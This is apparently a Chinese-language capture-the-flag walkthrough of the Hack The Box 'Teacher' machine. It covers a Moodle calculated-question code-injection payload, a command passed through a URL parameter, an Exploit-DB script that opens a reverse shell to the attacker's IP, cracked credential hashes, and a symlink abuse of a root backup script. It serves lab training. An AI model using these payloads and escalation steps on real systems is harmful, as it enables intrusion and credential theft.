Information Gathering
| IP Address | Opening Ports |
|---|---|
| 10.10.10.153 | TCP:80 |
$ ip='10.10.10.153'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-title: Blackhat highschool
|_http-server-header: Apache/2.4.25 (Debian)
Moodle CMS RCE
http://10.10.10.153/moodle/
![[Meachines] [Easy] Teacher Moodle CMS RCE+Backup.sh->ln软连接滥用权限提升插图](https://img.4awl.net/img/74/7b225bccf5d284f25c15700ed2432f.jpg "[Meachines] [Easy] Teacher Moodle CMS RCE+Backup.sh->ln软连接滥用权限提升插图")
在此位置少了一张图片显示
![[Meachines] [Easy] Teacher Moodle CMS RCE+Backup.sh->ln软连接滥用权限提升插图1](https://img.4awl.net/img/fe/298a685aa96358736362a78d08af3d.jpg "[Meachines] [Easy] Teacher Moodle CMS RCE+Backup.sh->ln软连接滥用权限提升插图1")
https://github.com/MartinxMax/ImageToAscii
油猴插件查看图片内容
![[Meachines] [Easy] Teacher Moodle CMS RCE+Backup.sh->ln软连接滥用权限提升插图2](https://img.4awl.net/img/41/63e34e44ef7831bcbc6c336db4633a.jpg "[Meachines] [Easy] Teacher Moodle CMS RCE+Backup.sh->ln软连接滥用权限提升插图2")
Hi Servicedesk,..I forgot the last charachter of my password. The only part I remembered is Th4C00lTheacha...Could you guys figure out what the last charachter is, or just reset it?..Thanks,.Giovanni.
# echo '10.10.10.153 teacher.htb'>>/etc/hosts
http://teacher.htb/moodle/
![[Meachines] [Easy] Teacher Moodle CMS RCE+Backup.sh->ln软连接滥用权限提升插图3](https://img.4awl.net/img/3e/ba26dcab3f67ef22241a5894909cad.jpg "[Meachines] [Easy] Teacher Moodle CMS RCE+Backup.sh->ln软连接滥用权限提升插图3")
![[Meachines] [Easy] Teacher Moodle CMS RCE+Backup.sh->ln软连接滥用权限提升插图4](https://img.4awl.net/img/eb/39e6397d1b74fb4e1c23fcf4c466d6.jpg "[Meachines] [Easy] Teacher Moodle CMS RCE+Backup.sh->ln软连接滥用权限提升插图4")
![[Meachines] [Easy] Teacher Moodle CMS RCE+Backup.sh->ln软连接滥用权限提升插图5](https://img.4awl.net/img/96/a2e59b17620df7636b4ed33ffbb1e6.jpg "[Meachines] [Easy] Teacher Moodle CMS RCE+Backup.sh->ln软连接滥用权限提升插图5")
Username:giovanni
Password:Th4C00lTheacha#
![[Meachines] [Easy] Teacher Moodle CMS RCE+Backup.sh->ln软连接滥用权限提升插图6](https://img.4awl.net/img/d8/17d01a99b412ec254dc1dc4ca094ae.jpg "[Meachines] [Easy] Teacher Moodle CMS RCE+Backup.sh->ln软连接滥用权限提升插图6")
http://teacher.htb/moodle/course/view.php?id=2
添加Quiz
![[Meachines] [Easy] Teacher Moodle CMS RCE+Backup.sh->ln软连接滥用权限提升插图7](https://img.4awl.net/img/ce/f9746c319c4e345e3d3bbfe42a5315.jpg "[Meachines] [Easy] Teacher Moodle CMS RCE+Backup.sh->ln软连接滥用权限提升插图7")
新建关于计算的新问题
![[Meachines] [Easy] Teacher Moodle CMS RCE+Backup.sh->ln软连接滥用权限提升插图8](https://img.4awl.net/img/ca/cca80361d2c1749fd0bbe3b295cdc6.jpg "[Meachines] [Easy] Teacher Moodle CMS RCE+Backup.sh->ln软连接滥用权限提升插图8")
/*{a*/$_GET[shell];//{x}}
![[Meachines] [Easy] Teacher Moodle CMS RCE+Backup.sh->ln软连接滥用权限提升插图9](https://img.4awl.net/img/62/ea8049366b11e9952d9b9c45c524d1.jpg "[Meachines] [Easy] Teacher Moodle CMS RCE+Backup.sh->ln软连接滥用权限提升插图9")
http://teacher.htb/moodle/question/question.php?qtype=calculated&category=2&cmid=9&courseid=2&returnurl=%2Fmod%2Fquiz%2Fedit.php%3Fcmid%3D9%26addonpage%3D0&appendqnumstring=addquestion&id=6&shell=(date;ping%20-c%201%2010.10.16.33)
![[Meachines] [Easy] Teacher Moodle CMS RCE+Backup.sh->ln软连接滥用权限提升插图10](https://img.4awl.net/img/4e/1c3b1f0b91a1e0b9010d2e1f9d823d.jpg "[Meachines] [Easy] Teacher Moodle CMS RCE+Backup.sh->ln软连接滥用权限提升插图10")
https://www.exploit-db.com/exploits/46551
$ php exp.php url=http://teacher.htb/moodle user=giovanni pass=Th4C00lTheacha# ip=10.10.16.33 port=443 course=1 course=2
![[Meachines] [Easy] Teacher Moodle CMS RCE+Backup.sh->ln软连接滥用权限提升插图11](https://img.4awl.net/img/37/303d8d1375ff8464aa1c23515e8116.jpg "[Meachines] [Easy] Teacher Moodle CMS RCE+Backup.sh->ln软连接滥用权限提升插图11")
Laternal Movement via mysql hash crack
![[Meachines] [Easy] Teacher Moodle CMS RCE+Backup.sh->ln软连接滥用权限提升插图12](https://img.4awl.net/img/f9/d09f313dbb6522a9c35267cf1f142b.jpg "[Meachines] [Easy] Teacher Moodle CMS RCE+Backup.sh->ln软连接滥用权限提升插图12")
username:rootpassword:Welkom1!
$ mysqldump -u 'root' -p -h 'localhost' 'moodle' > /tmp/res.txt
![[Meachines] [Easy] Teacher Moodle CMS RCE+Backup.sh->ln软连接滥用权限提升插图13](https://img.4awl.net/img/ff/25c448c83d7d09a7afb80a8cb0c9c4.jpg "[Meachines] [Easy] Teacher Moodle CMS RCE+Backup.sh->ln软连接滥用权限提升插图13")
| guest | $2y$10$ywuE5gDlAlaCu9R0w7pKW.UCB0jUH6ZVKcitP3gMtUNrAebiGMOdO |
| admin | $2y$10$7VPsdU9/9y2J4Mynlt6vM.a4coqHRXsNTOq/1aA6wCWTsF2wtrDO2 |
| giovanni | $2y$10$38V6kI7LNudORa7lBAT0q.vsQsv4PemY7rf/M1Zkj/i1VqLO0FSYO |
| Giovannibak | 7a860966115182402ed06375cf0a22af
![[Meachines] [Easy] Teacher Moodle CMS RCE+Backup.sh->ln软连接滥用权限提升插图14](https://img.4awl.net/img/c0/2db09971edd5fe0a82e4a26a55bba6.jpg "[Meachines] [Easy] Teacher Moodle CMS RCE+Backup.sh->ln软连接滥用权限提升插图14")
password:expelled
![[Meachines] [Easy] Teacher Moodle CMS RCE+Backup.sh->ln软连接滥用权限提升插图15](https://img.4awl.net/img/f2/e053dfc71f16a41e27252f7b8c81da.jpg "[Meachines] [Easy] Teacher Moodle CMS RCE+Backup.sh->ln软连接滥用权限提升插图15")
User.txt
2ed3dfa090a2c381f63965b415be749b
Privilege Escalation:Backup.sh && ln abuse bypass
Pspy监控
![[Meachines] [Easy] Teacher Moodle CMS RCE+Backup.sh->ln软连接滥用权限提升插图16](https://img.4awl.net/img/72/5c455f5879278ee2e146570e539bab.jpg "[Meachines] [Easy] Teacher Moodle CMS RCE+Backup.sh->ln软连接滥用权限提升插图16")
![[Meachines] [Easy] Teacher Moodle CMS RCE+Backup.sh->ln软连接滥用权限提升插图17](https://img.4awl.net/img/c6/bb346baa797dbd224b009e81c0cd88.jpg "[Meachines] [Easy] Teacher Moodle CMS RCE+Backup.sh->ln软连接滥用权限提升插图17")
![[Meachines] [Easy] Teacher Moodle CMS RCE+Backup.sh->ln软连接滥用权限提升插图18](https://img.4awl.net/img/51/c3d59de4f1f4e37540f102175f4b43.jpg "[Meachines] [Easy] Teacher Moodle CMS RCE+Backup.sh->ln软连接滥用权限提升插图18")
通过创建courses软连接,使sh脚本读取备份courses(软连接)->/root下内容
$ rm -rf ~/work/tmp/courses/
$ mv ~/work/courses ~/work/courses.bak
$ ln -s /root ~/work/courses
![[Meachines] [Easy] Teacher Moodle CMS RCE+Backup.sh->ln软连接滥用权限提升插图19](https://img.4awl.net/img/b2/66a3a26d0c4a9b69d9d10c09497885.jpg "[Meachines] [Easy] Teacher Moodle CMS RCE+Backup.sh->ln软连接滥用权限提升插图19")
Root.txt
d27323046410b2d338961ff01b2aaadf
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)
